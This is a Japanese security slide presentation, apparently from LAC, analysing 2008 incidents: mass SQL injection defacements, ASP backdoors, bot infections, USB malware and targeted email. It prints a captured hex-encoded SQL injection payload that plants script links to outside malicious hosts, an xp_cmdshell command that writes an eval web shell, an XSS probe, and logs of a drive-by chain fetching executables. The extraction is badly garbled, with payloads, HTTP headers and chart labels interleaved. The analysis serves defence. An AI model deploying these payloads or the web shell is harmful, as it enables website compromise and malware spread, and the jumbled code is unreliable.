大規模インシデントの裏で進行していること - IPA 独立行政法人 情報処理

～大規模インシデントの裏で進行していること～
株式会社ラック
サイバーリスク総合研究所
[email protected]
http://www.lac.co.jp/
株式会社ラック
ITを活用し企業のリスク管理を支援する、次代と経営を拓くセキュリティプランナー
1986年、株式会社ラックは設立されました。”Little eArth Corporation”という社名には、情報化社会の進展で
地球が加速的に縮小してゆく中で、国や企業のIT基盤を支えていこうという理念がこめられています。
独立系セキュリティベンダーとして、日本国内での10年以上にわたる豊富な実績がお客様の信頼の証です。
セキュリティ事業に従事するエンジニア・営業数は国内最大級の規模を誇ります。
商 号
株式会社ラック
LAC：Little eArth Corporation Co., Ltd.
設 立
1986年(昭和61年)9月
資本金
11億5,942万6,500円
株 主
ラックホールディングス株式会社(100%)
代 表
代表取締役社長 執行役員社長 齋藤 理
売上高
7,154百万円(22期：2007年12月期)
本社 〒105-7111 東京都港区東新橋1-5-2
汐留シティセンター11F
03-5537-2600(大代表)
03-5537-2610(営業統括本部)
セキュリティ監視センターJSOC
〒105-0001 東京都港区虎ノ門4-1-17
神谷町プライムプレイス3F
名古屋オフィス
〒 460-0008 名古屋市中区栄3-15-27
名古屋プラザビル 9F
6,454百万円(21期：2006年12月期)
5,841百万円(20期：2005年12月期)
決算期
3月末日
従業員数
319名 ＇2008年10月現在（
認定資格
経済産業省情報セキュリティ監査企業登録
情報セキュリティマネジメントシステム
(ISO/IEC 27001)認証取得(JSOC)
プライバシーマーク認定取得
■ JSOC (Japan Security Operation Center)
JSOCは、ラックが運営する情報セキュリティに関する
オペレーションセンターです。高度な分析システム
や業界屈指の堅牢な設備を誇り、24時間365日運営
され、高度な技術者を配置しています。ラックのセ
キュリティサービスの実績は、2000年の九州・沖縄サ
ミットの運用・監視を皮切りに、日本の各分野での
トップ企業などを中心に、高レベルのセキュリティが
要求されるお客様にその高品質なサービスを提供し
ています。
2
スピーカ
にし
もと
いつ
ろう
西本 逸郎
昭和３３年
昭和５９年３月
昭和５９年４月
昭和６１年１０月
CISSP
福岡県北九州市生まれ
熊本大学工学部土木工学科中退
情報技術開発株式会社入社
株式会社ラック入社
通信系ソフトウェアやミドルウェアの開発に従事。１９９３年ドイツのシーメンスニックスドルフ社と
提携し、オープンPOS＇ WindowsPOS（を世界に先駆け開発・実践投入。２０００年よりセキュリ
ティ事業に身を転じ、日本最大級のセキュリティセンターＪＳＯＣの構築と立ち上げを行う。さらな
るＩＴ利活用を図る上での新たな脅威への研究や対策に邁進中。
情報セキュリティ対策をテーマに官庁、大学、その他公益法人、企業、各種ＩＴイベント、セミ
ナーなどでの講演、新聞・雑誌などへの寄稿等多数
経済産業省 電子商取引等に関する法的問題検討会 委員＇２００７年～（
IPA セキュリティ＆プログラミングキャンプ実行委員＇２００７年～（
＇財（日本情報処理開発協会 リスク管理統制対応評価検討委員
ＲＳＡカンファレンスプログラム委員＇２００８年（
株式会社ラック 取締役 執行役員 サイバーリスク総合研究所長
特定非営利活動法人 日本ネットワークセキュリティ協会 理事、政策
部会長＇現任（、セキュリティ評価WGリーダ/ST作成WGリーダ＇歴任（
特定非営利活動法人 日本セキュリティ監査協会 理事
データベースセキュリティコンソーシアム 理事、事務局長
連載・コラム
西本逸郎のセキュリティー表ウラ
熊本大学大学院自然科学研究科在籍
セキュリティー表ウラ
検索
http://it.nikkei.co.jp/security/column/nishimoto_security.aspx
3
緊急対応出動状況 ２００８
2008年実績
何がほしいのか？
CALL ６８件
世界的不況で○○が増加？
出動 ５２件
SQLインジェクション
漏洩系 ９件 改ざん系 １２件
外部からの不正プログラム注入 ８件 内部犯行 ９件
ＭＡＸ
72時間
１１９
主
対応 治
状況把握：ヒアリングシート、被害内容
ＥＲ オペ
原因分析＇鳥瞰検査、分析（
致命傷からの脱却 トリアージ、被害拡大防止、暫定再開、対策本部
１Ｗ
～
1ヶ月
復旧 オペ
機能再開
警
戒
運
用
1ヶ月
～
1年
回復
完全再開
通
常
運
用
恒常
平常オペレーション
医
高優先度脆弱性対応、検知機構、弱点防御機能
クリーニング
スパイラル開発・運用体制整備、緊急事態解除
セキュリティ推進体制整備
セキュア開発、データベース、教育
自主運用
PDCA、PCIDSS適合、認証取得
セキュリティ委員会
4
２００８年緊急対応
原因・手口
紛失
2%
他
13%
SQL
インジェクション
ウイルス
17%
パスワード
クラック
2%
被害内容
侵入 他
6% 6% 情報漏洩
21%
DOS
15%
41%
改ざん
27%
6% BOT
DDOS 15%
Exploit
4%
情報窃取
25%
誰がどこで、
どうやって知った？
100%
出動実績＇２００８年通期（
90%
80%
計52件＇コール６８件（ 過去最高＇当社比（
障害
15%
内部
33%
内部
48%
70%
BOT
60%
2007年は43件＇通期（
50%
2006年は34件＇通期（
40%
30%
※BOT
コンピュータウイルスの一種
攻撃者がパソコンを乗っ取るための悪質プログラム。
乗っ取ったパソコンを(ロ)ボットのように意のままに制御する。
外部
67%
20%
外部
52%
内部
35%
外部
50%
10%
0%
5
犯人
犯行場所
検知
２００８年緊急対応－ SQLインジェクション(４１%)の内訳
SQLインジェクションの内訳
１．改ざん
情報窃取
43%
改ざん
57%
① 閲覧者を悪質サイトへ誘導しBOTを仕込む
② 改ざん方法は2種類ある
(1)DBの文字型カラムに全て「誘導スクリプト」を追加し、
DB情報を編集しているページが結果的に改ざん＇大多数（
(2)尐数としてWebプログラムやHTMLに誘導スクリプトを追加
③悪質サイトは、多重構造になっており、全体像を掴むのは困難
④下期以降急速に増加
２．情報窃取
① SQLインジェクションでダイレクトに抜いていくものは減尐傾向
② バックドア＇Webアプリ（を設置しバックドア経由でアクセス
(1)POSTでのアクセスがほとんど
(2)インジェクションで侵入するタイプと、
保守アカウントの奪取の２通り
③何をやったか分からないようにしている。
④Webアプリ経由で侵入しWebアプリが狙われる
⑤下期以降、目だった行動は減尐
6
２００8年緊急対応 －
ウイルス系での被害
Antiny
41%
マルウェア
12%
BOT
BOT
47%
ウイルス・BOT被害(３２%)の内訳
１．BOT
① 外部のホームページ閲覧
② USBメモリ＇デジカメなど（
③ 標的型メール
④ 今後は偽ソフトによるものが増加？
⑤ 踏台と標的の２パターンある
２．Antinny
Winny 経由で、感染するウイルス
内部で発生するというより、自宅など。
相変わらず、発生。
３．マルウェア
内部犯行のため、サーバやパソコンに
マルウェアを仕掛けた
7
２００8年緊急対応 －
内部(３３%)の内訳
１．故意の犯行
過失
47%
故意
53%
① 他人の情報の盗み見
② 社内DBの内容改ざん
③ 業務妨害＇Antinyに見せかけた犯行（
２．過失
① 紛失
② Antiny
8
２００8年緊急対応 －
内部脅威＇４８%（の対象
Antinyに似せた暴露事件
Winnyを利用した策略
他 内部犯行
他
28%
内部からの情
報漏洩は、
内部犯だけを
見ても駄目なの
か、、
BOT
32%
外部から
単なる踏み台で操作
・外部へDDoS
・SPAMの踏み台
調査・情報窃取で操作
・内部ネットワーク
・内部サーバ
・パスワード盗聴ソフトなど
外部から
来た
来た
紛失
4%
もともと
もともと 内部
内部
Antiny
28%
マルウェア
8%
内部の人間が故意に、
内部の情報窃取やDB改ざん
を目的に
9
最近の状況
最近、発生していること。
１．サイトからの個人情報漏洩
２．サイトを改ざんし、サイト閲覧者のパソコン
にウイルス＇ボット（を感染させる。
３．ＵＳＢメモリからのウイルス＇ボット（感染が増大
４．特定組織を狙った標的型メール
今後、偽ソフトを含め、
一般化する危険性大
狙いは、
何だろうか？
10
情報漏洩＇窃取（ よく見かけるパターン
リモートから
コントロール
インターネット
リモートから
コントロール
ファイアウォール
バックドア
Webアプリ
Webサーバ
データコピー
バックドアの
情報の窃取 インストール
守っているデータベー
スに侵入されるから、
もちろんインジェクショ 何でもし放題。
ンが利くのは問題だが、 どうして気が付かな
気が付かないのは
かったのだろうか？
もっと問題だ！
SQLインジェクション
侵入
バックドア
データベース
ボット的
バックドア
ボット的
11
流行の改ざん攻撃
攻撃も、その後の侵入
手口も、何をやってい
るのか実態がつかめな
いのか、、
データベース＇ホームページ（
改ざん攻撃
POST
/index.asp?a=%82%A4';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020
00400054002000760061007200630068006100720028003200350035029002C004000430020007600610072006300680061
007200280032003500350029002000440045043004C0041005200450020005400610062006C0065005F0043007500720073
006F00720020004305500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0610
06D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007
300200061002C0073007900730063006F006C0075006D006E0073002006200200077006800650072006500200061002E006
90064003D0062002E0069006400200061006E06400200061002E00780074007900700065003D00270075002700200061006
E006400200028006202E00780074007900700065003D003900390020006F007200200062002E0078007400790070006503D
003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E0078007
4007900700065003D00310036003700290020004F00500045004E002005400610062006C0065005F0043007500720073006
F00720020004600450054004300480020004E04500580054002000460052004F004D00200020005400610062006C0065005
F004300750072007306F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028040
004000460045005400430048005F005300540041005400550053003D003000290020004200450470049004E002000650078
00650063002800270075007000640061007400650020005B0027002B0400054002B0027005D00200073006500740020005
B0027002B00400043002B0027005D003D007207400720069006D00280063006F006E007600650072007400280076006100
72006300680061007202C005B0027002B00400043002B0027005D00290029002B00270027003C007300630072006900700
740020007300720063003D0068007400740070003A002F002F007700770077002E0032003100310037003900360036002E0
06E00650074002F006600750063006B006A00700030002E006A0073003E003C002F007300630072006900700074003E002
DECLARE @T varchar(255),@C varchar(255)
7002700270029004600450054004300480020004E04500580054002000460052004F004D00200020005400610062006C006
DECLARE Table_Cursor CURSOR FOR
5005F004300750072007306F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004
C04F005300450020005400610062006C0065005F0043007500720073006F0072002000440045004104C004C004F0043004
select a.name,b.name from sysobjects a,syscolumns b
1005400450020005400610062006C0065005F0043007500720073006F00720%20AS%20NVARCHAR(4000));EXEC(@S);-where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or
HTTP/1.
b.xtype=167)
0{D}{A}
OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor
Connection: keep-alive{D}{A}
@T,@C WHILE(@@FETCH_STATUS=0)
Content-Type:INTO
text/html{D}{A}
Content-Length:
0{D}{A}
BEGIN
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script
Host: xxxxxxxxxxxxxxxxxxx.jp{D}{A}
src=http://www.2117966.net/fuckjp0.js></script>''')
Accept: text/html,
*/*{D}{A}
FETCH
NEXT FROM Table_Cursor INTO @T,@C
User-Agent: Mozilla/3.0 (compatible; Indy Library){D}{A}
END CLOSE Table_Cursor DEALLOCATE Table_Cursor
12
12
改ざんサイト
悪のサイトへ
悪質プログラムの
置き場達
利用者
流行の改ざん攻撃
あちゃ、、、orz
無効な％は
除去するの？？？？？
構文エラーとならない？
なんで？IIS/ASP
さらに巧妙化した攻撃 30.SEP.2008
さらに難読化
2008-09-29 23:27:15 61.152.246.157 - W3SVC1 <ホスト名> <IPアドレス> 80 GET
DEC%LARE%20@S%20VAR
/対象のWebアプリケーション.asp - 200 <ドメイン名> a_id=4731;b_id=2'%3BDECLARE%20@S%20VARCHAR(4000)%3BSET%20@S%3DCA
%CHAR(4000)%3BS%ET%20
ST(0x4445434C415245204054207661726368617228323535292C404320766172636
IDS/IPS
検出・防御可否
検出・防御可否
861722832353529204445434C415245205461626C655F437572736F722043555253
@S%3DCA%ST ・・・・
4F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D2
JSOC追加機能
ベンダーオリジナル
07379736F626A6563747320612C737973636F6C756D6E732062207768657265206
製品A
×
○
・・・・e%xec%20(@S)
12E69643D622E696420616E6420612E78747970653D27752720616E642028622E7
DEC%%%%%LA%%RE とか
製品B
×
○
8747970653D3939206F7220622E78747970653D3335206F7220622E78747970653
製品C
○
○
D323331206F7220622E78747970653D31363729204F50454E205461626C655F437
572736F72204645544348204E4558542046524F4D20205461626C655F437572736F
製品D
×
×
7220494E544F2040542C4043205748494C4528404046455443485F5354415455533
D302920424547494E20657865632827757064617465205B272B40542B275D207365
74205B272B40432B275D3D727472696D28636F6E76657274287661726368617228
34303030292C5B272B40432B275D29292B27273C736372697074207372633D6874
74703A2F2F64726D79792E636E3E3C2F7363726970743E27272729464554434820
4E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C40
原則
4320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F4341
ログなし
5445205461626C655F437572736F72%20AS%20VARCHAR(4000))%3Bexec%20(@S)
%3B-- -
そうだよね！ GETやPOSTでなく、、
そう言えば、昔はGETが危険などと言われてたなぁ、、
13
<sc%ript>al%ert(docu%me
nt.coo%kie)</scr%ipt>
XSSでも、、、
デフォルト
ログなし
でも渡せるんだ！
流行の改ざん攻撃
膨大なアプリケーション
改ざん攻撃の
やっかいさ、、
Googleなどで
標的確認
リストアップ
侵入や情報窃取の場合
は、一発の攻撃で成功
することはまず無い。
膨大な調査が必要！
どこに
穴があるか
分からない
改ざんや破壊のほうが、
簡単なんだ
14
ちょっと変わった改ざん事件
二つのホームページ改ざん
でも、これって良く
聞く話だよね。
適当に検索し、
一 無差別に攻撃しDB改ざん
般
的
⇒結果ホームページ改ざん
当たり外れあり
気づかれ易い
DBに侵入後、
フロントのWebのDISKを
マウント。
と
あ 小さなバックドア＇ASP（作成
る 小さなバックドア経由で
ケ 多機能バックドア作成
ー Aspファイルを改ざん
ス
何が標的型なの？
狙い済ました攻撃
気づかれ難い
ホームページが
検索サイトに登録される改ざんサイト
閲覧
改ざんされ
検索キーワードに引っかかる無効な誘導タグ
密かに
別な悪質サイトに
誘導
侵入ポイ
ントはここ
不正プログラムが
インストールされる
DB
Web
ネットからは直接
アクセスできない
15
ちょっと変わった改ざん事件
小さなバックドア
このバックドアをPOSTで呼び出し、多機能バックド
アを作成する
以下のようなコマンドをインジェクションし、小さなバックドアを作成する。
exec master..xp_cmdshell „echo ^<%eval(request(“a”))%^> >c:¥inetpub¥wwwroot¥小さなバックドア.asp'
<%eval(request(“a”))%^>
以下は上記の小さなバックドアと同じ、デフォルトのページに１行埋め込んだものを配置する。
IISデフォルトインストー
ル時のファイルかと
思ったら、一行なんか
入ってる。ログをみても
怪しくないし、、、orz
16
バックドアって？
情報窃取・密かなサイト改ざん
多機能なバックドア
この多機能なバックドアを使用して、、
１．更なる侵入・調査
２．パスワード盗聴・ネットワーク盗聴プログラム
インストール
３．ASPファイル改ざん などなど
ASPバックドアを探してみよう！
findstr /I /S gb2312 *.asp?
17
サイト改ざんと潜入ボットがやったこと
ボットで何を
するかな？
誘導
改ざんされた
サイト
悪質サイト
お伺い
犯人
一台が踏み台になり、内部
を徹底的に調査されるんだ
な。また、どの組織か分
かってやってるのだなぁ。
閲覧
自動
インストール
命令
お伺い
Firewall
Firewall
手動インストール
内部サーバ
改ざんサイトに
アクセスしたPC
恐らく予備機
調査
某会社
その後、これと同等のボットが
いくつか見つかった！
某○○、某△△、某××
侵入経路にはＵＳＢもあった
18
原因は、
①PCのOS、ブラウザ、ビューワなどに脆弱性があるから
②Firewallで外向き通信の精査が不十分
③内部のアカウントと権限管理が不十分
某民間企業にやってきた標的型メール
正直、全然怪し
くない。 それらし
い、書き方！
9月10日
•外務省のアドレスを詐称して発信
•添付ファイルとしてZIP圧縮された.exe
•発信元：中国のISP
本当に実在するか、
怖くて確認してな
い。
19
某民間企業にやってきた標的型メール
同
じ
週
に
さ
ら
に
一
通
続々やってくる。
次
の
週
に
、
ま
た
関係者の誰かがＢＯＴに
乗っ取られていると推測される。
ウイルス対策ソフト
は無反応！スパム
フィルタも通過！
うちはシンクライアン
トなので大丈夫！
あけちゃえ♪
さ
ら
に
翌
週
20
USBメモリを経由するマルウェア(事例)
出典: トレンドマイクロWebサイト
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Mal_Otorun1&VSect=S&Period=1y
(2008/12/10)
21
USBメモリを通じたマルウェア感染とは
Windows Vistaの場合
警視庁システム、ウイルス感染…ＵＳＢ経由？
Windows Vista が初期設定のままだと、USB メモリ内に Autorun.inf ファイル と実行
警視庁のオンラインシステムに接続している端末のパソコンが、「Ｗ３２・Ｄｏｗｎａｄｕｐ・Ｂ」と呼ばれる
ファイルが入っている場合は、いきなり実行ファイルが起動
新種のネットワーク感染型ウイルスに感染し、同庁がウイルス駆除のため、２２日午後から断続的にオ
ンライン業務を停止していることがわかった。
Windows 2000/XPの場合
この影響で、東京都内の警察署で、車庫証明の発行業務や免許更新の事務手続き業務を一時、手
USB メモリ内に、Autorun.inf ファイルと実行ファイルが入っている場合でも、パソコン
作業で行わざるを得なくなった。完全復旧は週明けの２６日になる見込み。
に挿した時点ですぐに実行ファイルが起動することはない。
同庁によると、２２日午後２時ごろ、端末のパソコン数台がウイルスに感染しているのを同庁のコン
しかし、マイコンピュータから、 USB メモリを認識したドライブをダブルクリック＇フォル
ピューターが検知した。同庁は感染の拡大を防ぐため、都内１０１の警察署をつなぐオンラインシステ
ムの一部を緊急停止するとともに、ウイルス対策ソフトを配信して駆除作業を実施したが、２３日になっ
ダのオープン（すると、実行ファイルが起動
ても作業は終わらず、さらに同日、数十台のパソコンの感染が判明した。このため、システムに接続し
ているパソコンで行う車庫証明の発行や免許更新の事務手続きも断続的に停止し、各署の窓口では
手作業で対応したという。
サイバー攻撃など外部からの侵入の恐れは低く、ＵＳＢメモリーなどをパソコンで使った際に感染し
た可能性があるとして、同庁で感染経路を調べている。
＇2009年1月24日 読売新聞（
出典:IPA 「ウイルス・不正アクセス届出状況について＇2007年6月分および上半期（ 」
http://www.ipa.go.jp/security/txt/2007/07outline.html
22
USBメモリを通じたマルウェア感染とは
最近話題の、「Downadup」 狡猾な感染
Autorun.infにまつわる様々な課題
不正なサービスが起動
Downadupに感染すると強制的に変更されてしまう。
「ここで自動再生させないように変更する」
一応、自動再生機能は無効化されている。
感染方法
が、公式的なautorun.infの対策
但し、クリックすると感染してしまう。
＇１（MS08-067のぜい弱性への攻撃
＇２（ネットワーク共有＇Admin$（への
ブルートフォース
＇３（USBメモリ経由
23
autorun.infを見つける事ができていない。
USBメモリを通じたマルウェア感染とは
何故、USBメモリ経由で持ち込むのか？
１．便利
圧倒的な手軽さ、便利。格安！
しかも、安心できないセキュリティ機能
１．USBを無効にする端末セキュリティ
２．USBで提供されるセキュリティソフト
２．クローズネットワーク
３．セキュリティ対応USBメモリ
クライアントは対策してても、サーバ は？
パッチ、データ移行。サーバでのUSB使用は意外に多い。
システム構築、保守ベンダー
クローズなので、個々の対策は甘い。
３．情報漏洩対策
情報の持ち出しは駄目だが、持ち込みはノーチェック
４．デジカメ
盲点。音楽プレイヤー。ICレコーダ。
５．Autorun・Autoplay神話
24
閑話休題
ファイル共有ソフトによる 暴露ウイルスは相変わらず。
2008年での重要インフラに関係するものだけでも非常に多い。
12月16日
12月08日
12月02日
11月10日
10月21日
10月21日
10月20日
10月03日
10月03日
10月01日
10月01日
10月01日
10月01日
09月09日
09月04日
09月01日
09月01日
07月29日
07月29日
07月01日
06月13日
06月09日
NTT西日本 奈良支店 4,594名分の顧客
埼玉県警 31名分の警察官宴会丸秘写真
日本原子力発電 放射性廃棄物に関する内部資料
KDDI 200名分の顧客
陸上自衛隊 イラク戦争の作戦資料
駒井病院 364名分の患者
横浜市 検査証
宮崎県 西都市 監査資料 給与明細
東京消防庁 448名分の江戸川区民
山形県 議事録
茨城県立中央病院 1名分の患者 106名分の個人情報
JA岡山西 451名分の顧客、口座番号
愛知県 1285名分の個人情報
岩手県 軽米町 特別養護老親ホーム入所希望者
山陽小野田市民病院 患者
大阪府立母子保健総合医療センター 400名分の患者
日本原燃 放射性廃棄物事業の議事録
尼崎医療生活協同組合 91名分の被介護者 3名分の職員
豊岡市 日本管財 旧出石町浄化センターの管理記録
慈恵会 西田病院 患者の個人情報
石川県 62名分の職員
NTT西日本 1,812名分の顧客
06月02日
05月23日
05月10日
05月09日
04月19日
04月16日
04月07日
03月26日
03月22日
資料
03月19日
03月19日
03月14日
03月06日
03月05日
02月15日
02月13日
01月31日
01月15日
01月08日
25
NTT西日本 2,845名分の顧客
山梨県 琴川ダムの内部文書
皇宮警察 内部資料
四国中央市 広報誌の原稿データ
唐津市消防本部 172名分の職員
東北発電工業 火力・原子力発電所の資料
メディコスヒラタ 患者の個人情報、病名
関西電力 検査計画書
日本銀行 松江支店 3社分の破綻懸念先金融機関の検査
東京都 深川消防署 15名分の都民 9名分の職員内部文書
さいたま市消防局 344名分の市民 行政ファイル
関西国際空港 空港の設計資料
北陸電力 鹿島建設 福浦風力発電所の内部情報
埼玉県 さいたま市北消防署 2名分の市民 質問調書
日立製作所 バブコック日立 火力発電所の資料
宮崎大学 医学部付属病院 22名分の患者
かんでんエンジニアリング 火力発電所の工事関係資料
福島第一原発のサーバーID、パスワード
熊本県相良村 187名分の個人情報
犯人目線で、、
あるツール
26
2008年年末のＳＱＬインジェクションお祭り騒ぎ
JSOCで検知したSQLインジェクションの件数
驚異的に増加するWebアプリケーションへの攻撃は、2008年12月には前月の100倍以上に急増
300,000
16,000,000
2005年1月～2008年11月
2008年1月～12月
14,000,000
2008年10月は266,257件
ボットによる攻撃
大量の攻撃にまぎれて他の攻撃も
250,000
12,000,000
200,000
10,000,000
150,000
100,000
2004年、JSOC初の
SQLインジェクション
を検知するJSIGを追加
さらにツールが進化
水面下で売買
検索エンジンの悪用
2008年12月は
約1500万件
11月の100倍以上
8,000,000
ツールによる攻撃が激化
JSOCから注意喚起を配信
6,000,000
4,000,000
SQLインジェクションによる
改ざん・情報漏えい事件
50,000
2,000,000
0
出典： 株式会社ラック JSOC調べ
27
20
08
年
20 1月
08
年
20 3月
08
年
20 5月
08
年
20 7月
08
2 0 年9
08 月
年
11
月
20
05
年
20 1
05 月
年
20 4
05 月
20 年
05 7月
年
20 10
06 月
年
20 1
06 月
年
20 4
06 月
20 年
06 7月
年
20 10
07 月
年
20 1
07 月
20 年4
0 月
20 7年
07 7月
年
20 10
08 月
20 年1
08 月
年
20 4
08 月
20 年
08 7月
年
10
月
0
改ざんサイトを閲覧すると、、、、＇年末のお祭りもの（
SQLインジェクションの標的とするページを検索
サイトにアクセスすると、、、
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf8&cl=3&ct=262144&wd=ク%20瘁+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:35 JST] "GET http://s1.cawjb.com/jp.js HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp.htm HTTP/1.0"
8&cl=3&ct=262144&wd=々%20基+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/index.htm HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/flash.htm HTTP/1.0"
8&cl=3&ct=262144&wd=蓮%20廚+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s126.cnzz.com/stat.php?id=1117531&web_id=1117531
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfHTTP/1.0"
8&cl=3&ct=262144&wd=猟%20こ+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/Ms06014.htm HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/ie7.htm HTTP/1.0"
8&cl=3&ct=262144&wd=繹%20塹+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://s1.cawjb.com/jp/ifff.swf HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utf192.168.200.128 - - [19/Dec/2008:17:44:36 JST] "GET http://60.196.70.130/cs/jp.exe HTTP/1.0"
8&cl=3&ct=262144&wd=昜%20が+inurl%3A.asp HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:37 JST] "GET
192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfhttp://219.232.243.93/stat.htm?id=1117531&agt=mozilla/4.0%20%28compatible%3B%20msie%206.0%3B%20windows%20nt%
8&cl=3&ct=262144&wd=雙%20砿+inurl%3A.asp HTTP/1.0"
205.1%29&r=http%3A//s1.cawjb.com/jp.js&aN=Microsoft%20Internet%20Explorer&lg=en192.168.200.128 - - [19/Dec/2008:17:44:50 JST] "GET http://www.baidu.jp/s?tn=baidujp&ie=utfus&OS=Win32&aV=4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%29&ntime=0.87247700%20122
8&cl=3&ct=262144&wd=る%20蝟+inurl%3A.asp HTTP/1.0"
9676275&repeatip=0&rtime=0&cnzz_eid=21765826-1229676275http%3A//s1.cawjb.com/jp.js&showp=801x611&st=1229676276&sin=-1&res=0 HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:37 JST] "GET http://s1.cawjb.com/jp/ly20088.asp?gameee=WIN%205,0,44,0
HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:44 JST] "GET http://ip.evebug.cn/downjp.txt HTTP/1.0"
192.168.200.128 - - [19/Dec/2008:17:44:44 JST] "GET http://ip.evebug.cn/jp1.exe HTTP/1.0"
これで、ボット本体がインストールされ、、、
以降、継続、、
28
改ざんサイトを閲覧すると、、、、＇年末のお祭りもの（
gov.cn と edu.cn
は攻撃対象から
除外
29
2008年年末のＳＱＬインジェクションお祭り騒ぎ
最初は韓国のボットが使用され、、
日本も感染を増やした。
日本、韓国、中国を分けて改ざん埋め込み。
jp.js、kr.js、cn.js
単に、目先の金銭目当てなのか？
２００９年12月19日以降JSOC顧客のうち３％程度で内部への潜入と見ら
れるインシデントを確認。⇒ 犯人サイドも確認出来ているはず。
並行して、Downadup.A → Bへ＇MS08-0678からUSB対応へ（
企業は脅威として
捉えていない。
一般PC
一般PCのネットワーク化
日本の潜入できた、、
組織＇ボットの接続元ドメイン（リストが
収集されていて全く不思議ではない。
組織の対策レベルが判明！
30
組織内潜入
キーワード
あ ら
標的になっているのは、パスワード周辺 の情報
＝ アカウント情報
ユーザＩＤ、パスワード、メールアドレス
重要インフラでも同様と見たほうが良い
31
犯罪者の費用対効果
狙いたいのは山々だ
残念ながら、この法則は、重要インフラ関係でも同様。
が、ガードが固いところ
をわざわざ狙うことは
銀行・証券
無い。こちらも危険に
つまり、、、
さらされる可能性が高
くなるし、、
本丸＇対策の厳しいところ（を狙いたいのは山々
大手店舗
⇒ 費用対効果が低い。
こっちのほうが、
しかも＇犯人にとって（リスクも高い
やりやすいぞ！
中小店舗
対策の甘い・出来ていないところ。自覚が無い。
⇒うちみたいな
費用対効果が高い！
小さなところ
樽の原則＇低い
なんて、、
しかも＇しかも犯人にとって（リスクも低い
ところから水は
永遠にビギ
流れる（は、組
個人さらに、破壊はまだ情報窃取よりやりやすい
ナーでいい
織の中だけじゃ
じゃん！
個人
重要インフラでの
ないんだなぁ、
個人
コンピュータ
個人
個人
は良く分から
セキュリティ・サプライチェーンを考えてみよう！
ないし、、
中小店舗中小店舗
中小店舗
個人
個人
個人
個人
気がつきもしな
いし、安全だ！
いざとなったら、
ノーガード戦
法で！
32
一言、言わせてください！
守れ！というセキュリティ
セキュリティの教科書
＝漏らすな！
皆さんのイメージも、、
事故前提時代のセキュリティ
目線が
全く異なる！
もらすなと言われても、なかなかやる気に、、
彼の地アメリカでは、、
＝止めるな！
ビジネス目線では、、、
稼げ！止めるな！というセキュリティ
33
１００年に一度時代のセキュリティ
す
ご も
トリアージ！限られた
資源。限られた時間。
最大限の効果！
なるだけ外に出さず
自分達でがんばろう！
セキュリティは特殊なも
のではない。時代を生
き抜く知恵だ！
セキュリティ屋に
騙されるな！
34
一言、言わせてください！
今、露呈している問題 ⇒ 今が原因ではない。
鍵は過去にあり！
バッファオーバーフロー
ＳＱＬインジェクション、ＸＳＳ
暴露ウイルス
効率性・利便性
ＵＳＢメモリ
標的型メール
習慣・ブーム
35
本日のキーワード これだけは記憶に
組織内のパソコンやサーバに潜入し、外部から操作。
内部情報を漁る、業務妨害を行なうなど。
従来のウイルス対策だけで潜入阻止はまず無理。
⇒ 炙り出す作戦。大掃除を！
最終的には人。「セキュリティは情報システム部門で、
ユーザがセキュリティを意識しないように！」が組織の強
度を下げコストを増やす元凶に。
⇒ ITリテラシとセキュリティ文化が組織力の源泉に
米百俵の精神！
36
株式会社ラック
http://www.lac.co.jp/
[email protected]
プライムプレイス ３Ｆ
37